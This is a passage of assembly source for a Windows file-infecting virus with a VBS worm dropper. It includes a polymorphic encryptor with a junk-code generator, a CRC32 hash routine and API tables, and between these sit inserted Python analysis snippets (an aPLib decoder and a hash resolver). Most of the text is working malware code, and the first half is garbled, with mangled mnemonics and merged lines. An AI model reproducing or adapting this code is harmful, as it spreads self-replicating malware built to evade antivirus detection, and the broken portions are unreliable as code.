Push Mem_Decommit

PUSH MAX_PATH

Push 12345678H

Org $ -4

VFreex DD 00000000H

Apicall VirtualFree

Lea EBX, OFS [WScript_exe]

Call @existe_archivo

JNC @vbs_fin

Lea EBX, OFS [Raxelp_VBS]

Call @existe_archivo

JC @vbs_fin

Push 10D

POP EBX

Call Random

XCHG ECX, EAX

Lea Edi, OFS [Nombres_Varios]

Inc ECX

@ VBS1:

XOR Al, Al

Scasb

JNZ @ VBS1

Loop @ VBS1

Push EDI

@ VBS2: XOR Al, Al

Inc ECX

Scasb

JNZ @ VBS2

Dec ECX

POP EDI

Mov by [largovbs], cl

Mov dwo [Guardanom], EDI

MOV EBX, EDI

Call Droppear_pe

JC @vbs_fin

MOV EBX, DWO [Guardanom]

Call infecta_pe

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_New

Push EAX

Push EAX

Push generic_read generic_write

Lea Eax, OFS [Raxelp_VBS]

Push EAX

Apicall Createfilea

Mov dwo [fhandle_wvbs], EAX

INC EAX

JZ @vbs_fin

Dec EAX

XOR EBX, EBX

Push EBX

Push 4096D

Push EBX

Push Page_Readwrite

Push EBX

Push EAX

Apicall CreateFilemappingA

Mov DWO [MHANDLE_WVBS], EAX

OR EAX, EAX

JZ @vbs_cierrafile

XOR EBX, EBX

Push EBX

Push EBX

Push EBX

Push file_map_read file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap_wvbs], EAX

OR EAX, EAX

JZ @vbs_desmapea

Xchg EDI, EAX

Lea ESI, OFS [Gusano_VBS]

Push l_gusano_vbs

POP ECX

REP MOVSB

Push EDI

PUSH MAX_PATH

Push EDI

Apicall getWindowsDirectorya

OR EAX, EAX

JZ @vbs_cierratodo

POP EDI

Add Edi, EAX

MOV BYTE PTR [EDI], "/"

Inc EDI

Mov ESI, DWO [Guardanom]

Movzx ecx, by [largovbs]

REP MOVSB

Lea ESI, OFS [Gusano_VBS2]

Push l_gusano_vbs2

POP ECX

REP MOVSB

Sub EDI, DWO [BaseMap_WVBS]

Push dwo [BaseMap_WVBS]

Apicall unmapViewoffile

Push dwo [Mhandle_WVBS]

Apicall CloseHandle

XOR EBX, EBX

Push EBX

Push EBX

Push EDI

Push dwo [fhandle_wvbs]

Apicall setFilePointer

Push dwo [fhandle_wvbs]

Apicall setndoffile

Push dwo [fhandle_wvbs]

Apicall CloseHandle

Call @ VBS3

DB "shell32.dll", 00h

@ VBS3: Apicall LoadLibrarya

OR EAX, EAX

JZ @vbs_fin

Call @ VBS4

DB "shellexecutea", 00h, 5 dup (90h)

@ VBS4: Push EAX

Apicall getProcAddress

OR EAX, EAX

JZ @vbs_finxor EBX, EBX

Push EBX

Push EBX

Push EBX

Lea edx, OFS [Raxelp_VBS]

Push Edx

Push EBX

Push EBX

Call EAX

@VBS_FIN:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

IF Debug

Popad

RET

Else

Mov dwo [Guardaebp3], EBP

Popad

Mov EBX, 12345678H

Org $ -4

Guardaebp3 DD 00000000H

Push null

Call [EBX EXITTHREAD]

RET

ENDIF

@Vbs_cierratodo:

Push dwo [BaseMap_WVBS]

Apicall unmapViewoffile

@Vbs_desmapea:

Push dwo [Mhandle_WVBS]

Apicall CloseHandle

@Vbs_cierrafile:

XOR EBX, EBX

Push EBX

Push EBX

Push dwo [scriptum]

Push dwo [fhandle_wvbs]

Apicall setFilePointer

Push dwo [fhandle_wvbs]

Apicall setndoffile

Push dwo [fhandle_wvbs]

Apicall CloseHandle

JMP @vbs_fin

; Routine to check whether a file exists.
; EBX -> file name.
; Returns carry set if it exists.

@Existe_archivo:

Push EBX

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

Push sizeof_win32_find_data

Push null

Apicall VirtualaLloc

Mov dwo [Vallocz], EAX

OR EAX, EAX

JZ @ea_negativo

POP EBX

Push EAX

Push EBX

Apicall FindfirstFilea

INC EAX

JZ @ea_negativo

Dec EAX

Push EAX

Apicall FindClose

Push Mem_Decommit

Push sizeof_win32_find_data

Push 12345678H

Org $ -4

Vallocz DD 00000000H

Apicall VirtualFree

STC

Ret 0

@Ea_negativo:

Push Mem_Decommit

Push sizeof_win32_find_data

Push dwo [Vallocz]

Apicall VirtualFree

CLC

Ret 0

WORM_VBS ENDP

;--------------------------------------------------------------------------

DB "[" xor 40h

DB "D" xor 40h

DB "e" xor 40h

DB "s" xor 40h

DB "i" xor 40h

DB "g" xor 40h

DB "n" xor 40h

DB "e" xor 40h

DB "D" xor 40h

DB "" xor 40h

DB "B" xor 40hdb "y" xor 40h

DB "" xor 40h

DB "L" xor 40h

DB "i" xor 40h

DB "T" xor 40h

DB "e" xor 40h

DB "s" xor 40h

DB "y" xor 40h

DB "s" xor 40h

DB "]" xor 40h

DB 40h

;--------------------------------------------------------------------------
; PXPE: Plexar Polymorphic Engine: another lame poly written by me.
;
; ESI -> source
; EDI -> destination
; ECX -> size

PXPE PROC

Mov dwo [Origen], ESI

Mov dwo [destino], EDI

Mov dwo [tama], ECX

Call @INICIALIZAR_SEMILLAS

XOR EBX, EBX

Dec EBX

Call @aleatorio

MOV DWO [LLAVE], EAX

Mov EDI, DWO [Destino]

; Delta

Push EDI

Call @basura

Call @basura

POP EDX

Sub EDX, EDI

Mov dwo [Guardadelta2], EDX

MOV Al, 0e8h; Call

Stosb

XOR Eax, Eax; Delta

Stosd

Call @basura

Call @basura

Call @popear_delta

Call @basura

Call @basura

Call @ meter_tama

Call @basura

Call @basura

Call @colocar_lea

Call @basura

Mov dwo [Guardaloop], EDI

Call @basura

MOV AX, 03781H; XOR DWORD PTR [EDI]

Stosw

Mov Eax, DWO [LLAVE]

Stosd

Call @basura

Call @basura

Call @sumacuatro

Call @basura

Call @basura

MOV Al, 049h

Stosb

MOV AX, 850FH

Stosw

Mov Eax, Dwo [Guardaloop]

Sub Eax, EDI

Sub eax, 04h

Stosd

Call @basura

Call @basura

Mov Eax, EDI

Sub eax, dwo [destino]

Sub Eax, 05H

MOV EBX, DWO [Guardadelta]

Sub DWORD PTR [EBX], EAX

Mov EDX, DWO [Guardadelta2]

Sub DWORD PTR [EBX], EDX

Mov ESI, DWO [Origen]

MOV ECX, DWO [Tama]

Mov Eax, DWO [LLAVE]

@Recopia:

Movsd

XOR DWORD PTR [EDI-4H], EAX

Loop @recopia

RET

@INICIALIZAR_SEMILLAS:

Lea Edi, OFS [@savesemilla]

RDTSC

Stosd

Push 04h

POP Edilea ESI, OFS [@savesemilla]

Call CRC32

Mov DWO [Semilla_1], EAX

Apicall gettickcount

Add Eax, EAX

NOT EAX ; what crap ...

Push 04h

POP EDI

Lea ESI, OFS [@savesemilla]

Call CRC32

Mov DWO [Semilla_2], EAX

RET

; An indecent random number generator ...
;
; EBX -> limit.

@Aleatorio:

Push EDI

Push ECX

Push Edx

Push EBX

Mov Eax, Dwo [Semilla_1]

Imul Eax, Mierda_1

Add Eax, Mierda_2

Mov DWO [Semilla_1], EAX

Lea edi, OFS [Milonga]

Stosd

MOV EBX, DWO [SEMILLA_2]

Imul EBX, MIERDA_3

Add ebx, Mierda_4

MOV DWO [Semilla_2], EBX

XCHG EAX, EBX

Stosd

Lea ESI, OFS [MILONGA]

Push 08h

POP EDI

Call CRC32

POP EBX

XOR EDX, EDX

Div EBX

XCHG EDX, EAX

POP EDX

POP ECX

POP EDI

RET

Milonga DB 9 DUP (00h)

@Popear_Delta:

Push 04h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @Popear_Delta_i

CMP EAX, 01H

JZ @Popear_Delta_ii

CMP EAX, 02H

JZ @Popear_Delta_iii

CMP EAX, 03H

JZ @Popear_Delta_iv

JMP @Popear_Delta_iv

@Popear_Delta_r:

RET

@Popear_delta_i:

MOV Al, 05DH; POP EBP

Stosb

MOV AX, 0ED81H; SUB EBP

Stosw

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

JMP @Popear_Delta_r

@Popear_Delta_ii:

MOV Al, 058H

Stosb

MOV Al, 02DH

Stosb

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

Mov Al, 095H

Stosb

JMP @Popear_Delta_r

@Popear_Delta_iii:

MOV Al, 05BH

Stosb

MOV Al, 0BAH

Stosb

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

MOV AX, 0D329H

Stosw

MOV AX, 0DD87H

Stosw

JMP @Popear_Delta_r

@Popear_delta_iv:

MOV Al, 05ah

Stosb

MOV Al, 068H

Stosb

Mov Dwo [Guardadelta], EDI

Mov Eax, DWO [Origen]

Stosd

MOV Al, 05DH

Stosb

MOV AX, 0D587H

Stosw

MOV AX, 0D529H

Stosw

JMP @Popear_Delta_r

RET

@ Meter_tama:

Push 04h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @ meter_tama_i

CMP EAX, 01H

JZ @ meter_tama_ii

CMP EAX, 02H

JZ @ meter_tama_iii

CMP EAX, 03H

JZ @ meter_tama_iv

JMP @ meter_tama_iii

@ Meter_tamar:

RET

@ Meter_tama_i:

MOV Al, 0B9H

Stosb

Mov Eax, Dwo [Tama]

Stosd

JMP @ meter_tamar

@ Meter_tama_ii:

MOV Al, 068H

Stosb

Mov Eax, Dwo [Tama]

Stosd

MOV Al, 059H

Stosb

JMP @ meter_tamar

@ Meter_tama_iii:

MOV Al, 0BAH

Stosb

Mov Eax, Dwo [Tama]

NOT EAX

Stosd

MOV AX, 0CA87H

Stosw

MOV AX, 0D1F7H

Stosw

JMP @ meter_tamar

@ Meter_tama_iv:

XOR EBX, EBX

Dec EBX

Call @aleatorio

XCHG EDX, EAX

MOV Al, 068H

Stosb

MOV EAX, EDX

Stosd

MOV Al, 058H

Stosb

MOV Al, 035H

Stosb

Mov Eax, Dwo [Tama]

XOR EAX, EDX

Stosd

MOV Al, 091H

Stosb

JMP @ meter_tamar

@Colocar_lea:

Push 03h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @colocar_lea_i

CMP EAX, 01H

JZ @colocar_lea_ii

CMP EAX, 02H

JZ @colocar_lea_iii

JMP @colocar_lea_ii

@Colocar_lear:

RET

@Colocar_lea_i:

MOV AX, 0BD8DH

Stosw

Mov Eax, DWO [Origen]

Stosd

JMP @colocar_lear

@Colocar_lea_ii:

MOV Al, 0BFH

Stosb

Mov Eax, DWO [Origen]

Stosd

MOV AX, 0EF01H

Stosw

JMP @colocar_lear

@Colocar_lea_iii:

MOV Al, 068H

Stosb

Mov Eax, DWO [Origen]

Stosd

MOV Al, 05ah

Stosb

MOV AX, 0EA01H

Stosw

MOV AX, 0D787H

Stosw

JMP @colocar_lear

@Sumacuatro:

Push 04h

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @sumacuatro_i

CMP EAX, 01H

JZ @sumacuatro_ii

CMP EAX, 02H

JZ @sumacuatro_iii

CMP EAX, 03H

JZ @sumacuatro_iv

JMP @sumacuatro_iii

@Sumacuatror: Ret

@Sumacuatro_i:

MOV AX, 0C781H

Stosw

Mov Eax, 00000004H

Stosd

JMP @sumacuatror

@Sumacuatro_ii:

Mov Eax, 47474747h

Stosd

JMP @sumacuatror

@Sumacuatro_iii:

MOV Al, 47h

Stosb

MOV AX, 0C781H

Stosw

MOV EAX, 00000002H

Stosd

MOV Al, 47h

Stosb

JMP @sumacuatror

@SUMACUATRO_IV:

MOV AX, 0C781H

Stosw

MOV EAX, 00000003H

Stosd

MOV Al, 47h

Stosb

JMP @sumacuatror

; Garbage generator! Mega lamer!!!

@Basura:

Push 10D

POP ECX

@Basloop:

Push 08D

POP EBX

Call @aleatorio

OR EAX, EAX

JZ @ Basura_1

CMP EAX, 1H

JZ @ Basura_2

CMP EAX, 2H

JZ @ Basura_3

CMP EAX, 3H

JZ @ Basura_4

CMP EAX, 4h

JZ @ Basura_5

CMP EAX, 5h

        jz      @basura_6
        cmp     eax, 6h
        jz      @basura_7
        jmp     @basura_1

@basurar:
        loop    @basloop
        ret

@basura_1:
        push    07h
        pop     ebx
        call    @aleatorio
        lea     esi, ofs [@b1_tabla]
        add     esi, eax
        movsb
        xor     ebx, ebx
        dec     ebx
        call    @aleatorio
        stosd
        jmp     @basurar

@b1_tabla:
        db      0b8h                    ; mov eax
        db      0bbh                    ; mov ebx
        db      0bah                    ; mov edx
        db      0beh                    ; mov esi
        db      005h                    ; add eax
        db      02dh                    ; sub eax
        db      035h                    ; xor eax
        db      015h                    ; adc eax

@basura_2:
        push    15d
        pop     ebx
        call    @aleatorio
        add     eax, eax
        lea     esi, ofs [@b2_tabla]
        add     esi, eax
        movsw
        xor     ebx, ebx
        dec     ebx
        call    @aleatorio
        stosd
        jmp     @basurar

@b2_tabla:
        db      081h, 0c3h              ; add ebx
        db      081h, 0c2h              ; add edx
        db      081h, 0c6h              ; add esi
        db      081h, 0ebh              ; sub ebx
        db      081h, 0eah              ; sub edx
        db      081h, 0eeh              ; sub esi
        db      081h, 0f6h              ; xor esi
        db      081h, 0f2h              ; xor edx
        db      081h, 0f3h              ; xor ebx
        db      081h, 0d3h              ; adc ebx
        db      081h, 0d2h              ; adc edx
        db      081h, 0d6h              ; adc esi
        db      069h, 0c0h              ; imul eax
        db      069h, 0dbh              ; imul ebx
        db      069h, 0d2h              ; imul edx
        db      069h, 0f6h              ; imul esi

@basura_3:
        push    35d
        pop     ebx
        call    @aleatorio
        add     eax, eax
        lea     esi, ofs [@b3_tabla]
        add     esi, eax
        movsw
        jmp     @basurar

@b3_tabla:
        db      001h, 0d8h              ; add eax, ebx
        db      001h, 0d0h              ; add eax, edx
        db      001h, 0f0h              ; add eax, esi
        db      001h, 0d3h              ; add ebx, edx
        db      001h, 0f3h              ; add ebx, esi
        db      001h, 0c3h              ; add ebx, eax
        db      001h, 0dah              ; add edx, ebx
        db      001h, 0f2h              ; add edx, esi
        db      001h, 0c2h              ; add edx, eax
        db      001h, 0deh              ; add esi, ebx
        db      001h, 0d6h              ; add esi, edx
        db      001h, 0c6h              ; add esi, eax
        db      029h, 0d8h              ; sub eax, ebx
        db      029h, 0d0h              ; sub eax, edx
        db      029h, 0f0h              ; sub eax, esi
        db      029h, 0c3h              ; sub ebx, eax
        db      029h, 0d3h              ; sub ebx, edx
        db      029h, 0f3h              ; sub ebx, esi
        db      029h, 0c2h              ; sub edx, eax
        db      029h, 0dah              ; sub edx, ebx
        db      029h, 0f2h              ; sub edx, esi
        db      029h, 0c6h              ; sub esi, eax
        db      029h, 0deh              ; sub esi, ebx
        db      029h, 0d6h              ; sub esi, edx
        db      031h, 0d8h              ; xor eax, ebx
        db      031h, 0d0h              ; xor eax, edx
        db      031h, 0f0h              ; xor eax, esi
        db      031h, 0c3h              ; xor ebx, eax
        db      031h, 0d3h              ; xor ebx, edx
        db      031h, 0f3h              ; xor ebx, esi
        db      031h, 0c2h              ; xor edx, eax
        db      031h, 0dah              ; xor edx, ebx
        db      031h, 0f2h              ; xor edx, esi
        db      031h, 0c6h              ; xor esi, eax
        db      031h, 0deh              ; xor esi, ebx
        db      031h, 0d6h              ; xor esi, edx

@basura_4:
        mov     al, 068h                ; push
        stosb
        xor     ebx, ebx
        dec     ebx
        call    @aleatorio
        stosd
        push    03h
        pop     ebx
        call    @aleatorio
        lea     esi, ofs [@b4_tabla]
        add     esi, eax
        movsb
        jmp     @basurar

@b4_tabla:
        db      058h                    ; pop eax
        db      05bh                    ; pop ebx
        db      05ah                    ; pop edx
        db      05eh                    ; pop esi

@basura_5:
        push    11d
        pop     ebx
        call    @aleatorio
        lea     esi, ofs [@b5_tabla]
        add     esi, eax
        movsb
        jmp     @basurar

@b5_tabla:
        db      040h                    ; inc eax
        db      043h                    ; inc ebx
        db      042h                    ; inc edx
        db      046h                    ; inc esi
        db      048h                    ; dec eax
        db      04bh                    ; dec ebx
        db      04ah                    ; dec edx
        db      04eh                    ; dec esi
        db      093h                    ; xchg ebx, eax
        db      092h                    ; xchg edx, eax
        db      096h                    ; xchg esi, eax
        db      093h                    ; xchg ebx, eax

@basura_6:
        push    13d
        pop     ebx
        call    @aleatorio
        lea     esi, ofs [@b6_tabla]
        add     eax, eax
        add     esi, eax
        movsw
        jmp     @basurar

@b6_tabla:
        db      0f7h, 0d0h              ; not eax
        db      0f7h, 0d3h              ; not ebx
        db      0f7h, 0d2h              ; not edx
        db      0f7h, 0d6h              ; not esi
        db      0f7h, 0d8h              ; neg eax
        db      0f7h, 0dbh              ; neg ebx
        db      0f7h, 0dah              ; neg edx
        db      0f7h, 0deh              ; neg esi
        db      087h, 0dah              ; xchg ebx, edx
        db      087h, 0deh              ; xchg ebx, esi
        db      087h, 0d3h              ; xchg edx, ebx
        db      087h, 0d6h              ; xchg edx, esi
        db      087h, 0f3h              ; xchg esi, ebx
        db      087h, 0f2h              ; xchg esi, edx

@basura_7:
        push    31d
        pop     ebx
        call    @aleatorio
        lea     esi, ofs [@b7_tabla]
        add     eax, eax
        add     esi, eax
        movsw
        xor     ebx, ebx
        dec     ebx
        call    @aleatorio
        stosb
        jmp     @basurar

@b7_tabla:
        db      0c1h, 0d0h              ; rcl eax
        db      0c1h, 0d3h              ; rcl ebx
        db      0c1h, 0d2h              ; rcl edx
        db      0c1h, 0d6h              ; rcl esi
        db      0c1h, 0d8h              ; rcr eax
        db      0c1h, 0dbh              ; rcr ebx
        db      0c1h, 0dah              ; rcr edx
        db      0c1h, 0deh              ; rcr esi
        db      0c1h, 0c0h              ; rol eax
        db      0c1h, 0c3h              ; rol ebx
        db      0c1h, 0c2h              ; rol edx
        db      0c1h, 0c6h              ; rol esi
        db      0c1h, 0c8h              ; ror eax
        db      0c1h, 0cbh              ; ror ebx
        db      0c1h, 0cah              ; ror edx
        db      0c1h, 0ceh              ; ror esi
        db      0c1h, 0e0h              ; shl eax
        db      0c1h, 0e3h              ; shl ebx
        db      0c1h, 0e2h              ; shl edx
        db      0c1h, 0e6h              ; shl esi
        db      0c1h, 0f8h              ; sar eax
        db      0c1h, 0fbh              ; sar ebx
        db      0c1h, 0fah              ; sar edx
        db      0c1h, 0feh              ; sar esi
        db      0c1h, 0e0h              ; shl eax
        db      0c1h, 0e3h              ; shl ebx
        db      0c1h, 0e2h              ; shl edx
        db      0c1h, 0e6h              ; shl esi
        db      0c1h, 0e8h              ; shr eax
        db      0c1h, 0ebh              ; shr ebx
        db      0c1h, 0eah              ; shr edx
        db      0c1h, 0eeh              ; shr esi

@savesemilla    db 8 dup (00h)
semilla_1       dd 00000000h
semilla_2       dd 00000000h
llave           dd 00000000h
origen          dd 00000000h
destino         dd 00000000h
tama            dd 00000000h
guardadelta     dd 00000000h
guardadelta2    dd 00000000h
guardaloop      dd 00000000h

mierda_1        equ 1a7fc23bh
mierda_2        equ 000028b1h
mierda_3        equ 974d9db5h
mierda_4        equ 0000f3c9h

pxpe endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

;***********************************************************************
;* aPLib v0.22b - the smaller the better :)                            *
;* WASM & TASM assembler depacker                                      *
;*                                                                     *
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved               *
;***********************************************************************

; .386p
; .model flat
; .code

public _ap_depack_asm

_ap_depack_asm:
        push    ebp
        mov     ebp, esp
        pushad
        push    ebp
        mov     esi, [ebp+8]            ; C calling convention
        mov     edi, [ebp+12]
        cld
        mov     dl, 80h
literal:
        movsb
nexttag:
        call    getbit
        jnc     literal
        xor     ecx, ecx
        call    getbit
        jnc     codepair
        xor     eax, eax
        call    getbit
        jnc     shortmatch
        mov     al, 10h
getmorebits:
        call    getbit
        adc     al, al
        jnc     getmorebits
        jnz     domatch_with_inc
        stosb
        jmp     short nexttag
codepair:
        call    getgamma_no_ecx
        dec     ecx
        loop    normalcodepair
        mov     eax, ebp
        call    getgamma
        jmp     short domatch
shortmatch:
        lodsb
        shr     eax, 1
        jz      donedepacking
        adc     ecx, 2
        mov     ebp, eax
        jmp     short domatch
normalcodepair:
        xchg    eax, ecx
        dec     eax
        shl     eax, 8
        lodsb
        mov     ebp, eax
        call    getgamma
        cmp     eax, 32000
        jae     domatch_with_2inc
        cmp     eax, 1280
        jae     domatch_with_inc
        cmp     eax, 7fh
        ja      domatch
domatch_with_2inc:
        inc     ecx
domatch_with_inc:
        inc     ecx
domatch:
        push    esi
        mov     esi, edi
        sub     esi, eax
        rep     movsb
        pop     esi
        jmp     short nexttag
getbit:
        add     dl, dl
        jnz     stillbitsleft
        mov     dl, [esi]
        inc     esi
        adc     dl, dl
stillbitsleft:
        ret
getgamma:
        xor     ecx, ecx
getgamma_no_ecx:
        inc     ecx
getgammaloop:
        call    getbit
        adc     ecx, ecx
        call    getbit
        jc      getgammaloop
        ret
donedepacking:
        pop     ebp
        sub     edi, [ebp+12]
        mov     [ebp-4], edi            ; return unpacked length in eax
        popad
        pop     ebp
        ret
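The depacker above is Jibz's public aPLib v0.22b routine; Plexar calls it at run time to expand the compressed `dropper` blob stored further down, so an analyst who wants to look at that embedded file statically needs the same decoder. The Python below is an added example, not part of the Plexar source or of the aPLib distribution. It follows the listing's control flow step for step, including the details specific to this version: the three length adjustments in `normalcodepair`, the offset-reuse shortcut taken when the gamma value is 2, and the four-bit `111` code that emits either a zero byte or a one-byte match. The streams in the usage section and in the tests were constructed by hand for this example.

```python
"""aPLib v0.22b decoder mirroring _ap_depack_asm (added example, not project code)."""


def ap_depack(src: bytes) -> bytes:
    """Decompress one aPLib stream; returns the unpacked bytes."""
    out = bytearray()
    pos = 0            # esi: next input byte
    tag = 0            # dl: current tag byte
    bits_left = 0      # bits not yet consumed from 'tag'
    last_offset = 0    # ebp: offset reused by the 'gamma == 2' shortcut

    def getbit() -> int:                     # getbit: refill dl when the marker falls out
        nonlocal pos, tag, bits_left
        if bits_left == 0:
            tag, pos, bits_left = src[pos], pos + 1, 8
        bits_left -= 1
        return (tag >> bits_left) & 1

    def getgamma() -> int:                   # getgamma: value starts at 1, then
        value = 1                            # (data bit, continue bit) pairs follow
        while True:
            value = (value << 1) | getbit()
            if not getbit():
                return value

    def copy_match(offset: int, length: int) -> None:
        for _ in range(length):              # rep movsb from edi-offset: byte by byte,
            out.append(out[-offset])         # so an overlapping run repeats itself

    out.append(src[0])                       # the first byte is always a literal
    pos = 1
    while True:
        if getbit() == 0:                    # 0   : literal byte
            out.append(src[pos])
            pos += 1
        elif getbit() == 0:                  # 10  : gamma-coded offset/length pair
            g = getgamma()
            if g == 2:                       # 'loop normalcodepair' not taken: reuse offset
                offset, length = last_offset, getgamma()
            else:                            # normalcodepair
                offset = ((g - 3) << 8) | src[pos]
                pos += 1
                last_offset = offset
                length = getgamma()
                if offset >= 32000:
                    length += 2
                elif offset >= 1280:
                    length += 1
                elif offset <= 0x7F:
                    length += 2
            copy_match(offset, length)
        elif getbit() == 0:                  # 110 : one-byte short match, offset<<1 | (len-2)
            b = src[pos]
            pos += 1
            if b >> 1 == 0:                  # offset 0 is the end-of-stream marker
                return bytes(out)
            last_offset = b >> 1
            copy_match(b >> 1, 2 + (b & 1))
        else:                                # 111 : 4-bit offset, length 1; 0 writes a zero byte
            n = 0
            for _ in range(4):
                n = (n << 1) | getbit()
            if n == 0:
                out.append(0)
            else:
                copy_match(n, 1)


if __name__ == "__main__":
    # Hand-built stream: 'a', literals 'b','c', then a match (offset 3, length 6), then end.
    sample = b"a\x29bc\x03\x30\x00"
    print(ap_depack(sample))                 # b'abcabcabc'
```

Later aPLib releases changed the offset encoding (they track whether the previous code was a match and shift the gamma value accordingly), so a decoder written for a current aPLib will not unpack a v0.22b stream byte for byte; match the version to the depacker actually embedded in the sample.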

Where is Xiyomira? Where is Xomotice? Where is Xomo?

; Billy Belcebu's CRC32 calculator.
;
; CRC32 procedure
; --------------
;
; Input:
;   ESI = offset where the code to calculate begins
;   EDI = size of that code
; Output:
;   EAX = CRC32 of the given code
;
crc32 proc
        cld
        xor     ecx, ecx                ; optimized by me - 2 bytes
        dec     ecx                     ; less
        mov     edx, ecx
nextbytecrc:
        xor     eax, eax
        xor     ebx, ebx
        lodsb
        xor     al, cl
        mov     cl, ch
        mov     ch, dl
        mov     dl, dh
        mov     dh, 8
nextbitcrc:
        shr     bx, 1
        rcr     ax, 1
        jnc     nocrc
        xor     ax, 08320h
        xor     bx, 0edb8h
nocrc:  dec     dh
        jnz     nextbitcrc
        xor     ecx, eax
        xor     edx, ebx
        dec     edi                     ; 1 byte less
        jnz     nextbytecrc
        not     edx
        not     ecx
        mov     eax, edx
        rol     eax, 16
        mov     ax, cx
        ret
crc32 endp
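The CRC-32 routine above (Belcebu's, reused in many sources of this era) is the hash behind three things in this listing: the `CRCNOINF` table of names the infector refuses to touch, the `CRC_EXE`/`CRC_SCR` extension checks, and the export-name lookup keyed by `CRC32_GETPROCADDRESS`. Its constants are those of standard CRC-32: register initialised to 0FFFFFFFFh, polynomial 0EDB8h:8320h applied on a one bit shifted out to the right, result inverted at the end. That matters for an analyst, because any of those hashes can then be reproduced with an ordinary library instead of the sample's own code. The Python below is an added example, not part of the Plexar source: it re-implements the bit-serial loop as written, checks it against `zlib.crc32`, and shows the lookup-table reversal used to turn a hash list back into names. The candidate strings are the four-character prefixes from the listing's own comment table (case as extracted); the hashes resolved in the test are computed here rather than copied from the page.

```python
"""Reproduce the listing's CRC-32 and resolve a hash table (added example)."""
import zlib

POLY = 0xEDB88320          # the 0EDB8h:8320h pair XORed into bx:ax in 'nextbitcrc'

# Four-character prefixes from the listing's comment table (case as extracted).
PREFIXES_FROM_LISTING = [
    "DEFR", "SCAN", "Anti", "Rund", "WSCR", "CSCR", "DRWA", "SMAR", "Task",
    "AVPM", "AVP3", "AVPC", "Avwi", "AVCO", "VSHW", "FP-W", "F-ST", "F-PR", "F-AG",
]


def crc32_bitwise(data: bytes) -> int:
    """Bit-serial CRC-32 exactly as crc32 proc does it: the register starts at
    0FFFFFFFFh, each byte is XORed into the low byte, eight shift/XOR steps run
    ('nextbitcrc'), and the final value is inverted ('not edx' / 'not ecx')."""
    crc = 0xFFFFFFFF
    for byte in data:
        t = (crc ^ byte) & 0xFF                 # xor al, cl
        for _ in range(8):                      # nextbitcrc
            t = (t >> 1) ^ (POLY if t & 1 else 0)
        crc = (crc >> 8) ^ t                    # byte shuffle, then xor ecx,eax / xor edx,ebx
    return crc ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """True when the hand-rolled loop agrees with the library CRC-32."""
    return crc32_bitwise(data) == zlib.crc32(data)


def hash_prefixes(prefixes=PREFIXES_FROM_LISTING) -> dict:
    """Hash each candidate name the way the infector hashes file names."""
    return {p: crc32_bitwise(p.encode("ascii")) for p in prefixes}


def resolve_hashes(hashes, candidates) -> dict:
    """Reverse a hash list against a candidate word list (None = no candidate matched)."""
    table = {crc: name for name, crc in hash_prefixes(candidates).items()}
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    for name, crc in hash_prefixes().items():
        print(f"{name:5s} {crc:08X}  zlib agrees: {matches_zlib(name.encode())}")
    # The same call checks the export-name constant used for the API lookup.
    print(f"GetProcAddress -> {crc32_bitwise(b'GetProcAddress'):08X}")
```

Feeding `resolve_hashes` the `CRCNOINF` values from the listing together with a word list of process and product names is how the avoid-list is confirmed; a hash that resolves to nothing simply means the candidate list was incomplete, not that the routine differs.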

Where is Xiyomira? Where is Xomotice? Where is Xomo?

; General-purpose random number generator.
;
; EBX -> upper limit
random proc
        push    ecx edx edi ebx
        lea     edi, ofs [mariconada]
        rdtsc
        stosd
        push    04h
        pop     edi
        lea     esi, ofs [mariconada]
        call    crc32
        xchg    edx, eax
        push    edx
        lea     edi, ofs [mariconada]
        apicall gettickcount
        stosd
        sub     edi, 04h
        xchg    edi, esi
        push    04h
        pop     edi
        call    crc32
        pop     edx
        push    eax
        or      eax, edx
        pop     ecx
        and     edx, ecx
        xor     eax, edx
        pop     ebx
        xor     edx, edx
        div     ebx
        xchg    edx, eax
        pop     edi edx ecx
        ret
mariconada db 9 dup (00h)
random endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

; Tabla!
;
; Create    -> 01h
; File      -> 02h
; Map       -> 03h
; View      -> 04h
; Close     -> 05h
; Get       -> 06h
; Set       -> 07h
; Find      -> 08h
; Virtual   -> 09h
; Window    -> 0ah
; Directory -> 0bh
; Current   -> 0ch
; WaitFor   -> 0dh
; Thread    -> 0eh

hthread         dd 00000000h

apis_k32        db 01h, 02h, "A", 00h
                db 01h, 02h, 03h, "pingA", 00h
                db 03h, 04h, "Of", 02h, 00h
                db "Unmap", 04h, "Of", 02h, 00h
                db 05h, "Handle", 00h
                db 06h, 02h, "Size", 00h
                db 07h, 02h, "Pointer", 00h
                db 07h, "EndOf", 02h, 00h
                db 07h, 02h, "AttributesA", 00h
                db "Write", 02h, 00h
                db 08h, "First", 02h, "A", 00h
                db 08h, "Next", 02h, "A", 00h
                db 08h, 05h, 00h
                db 09h, "Alloc", 00h
                db 09h, "Free", 00h
                db 06h, 0ah, "s", 0bh, "A", 00h
                db 06h, 0ch, 0bh, "A", 00h
                db 07h, 0ch, 0bh, "A", 00h
                db 01h, 0eh, 00h
                db "Exit", 0eh, 00h
                db 0dh, "MultipleObjects", 00h
                db 0dh, "SingleObject", 00h
                db 06h, "TickCount", 00h
                db "LoadLibraryA", 00h
                db "Delete", 02h, "A", 00h
                db 07h, 0eh, "Priority", 00h
                db 0ffh
